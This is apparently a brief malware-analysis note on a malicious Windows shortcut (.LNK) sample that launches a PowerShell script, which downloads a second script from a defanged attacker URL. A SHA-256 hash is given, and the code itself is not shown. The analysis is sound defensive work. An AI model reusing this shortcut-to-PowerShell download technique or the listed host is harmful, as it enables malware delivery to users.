I have downloaded this Microsoft shortcut malicious sample from Virustotal for analysis
After downloading, I renamed as sample.lnk. (Microsoft shortcut extension .LNK)
When I opened properties tab of this file, found below properties which clearly shows its now shortcut of any application but a PowerShell script which executed on opening.
- Target Type: Application
- Target: PowerShell scrip
- Description: Windows PowerShell
I copied and pasted PowerShell script to text file.
Behavior of PowerShell script:
- Download another PowerShell script out-763347625.ps1 from URL https[:]// latinotca-ar[.]com
I double click on it to check the behavior, a command prompt windows opened and closed.
I could see the PowerShell script executed and tried to connect to the URL. WireShark captured the network traffic.
The web site has taken down. I tried to open the URL in browser, URL is inaccessible.
VIrusTotal sample:
SHA-256: 5c5c2c6197d4b1c24c438b8fb0452257c9e4085ac59297a985ec92ef1720b74d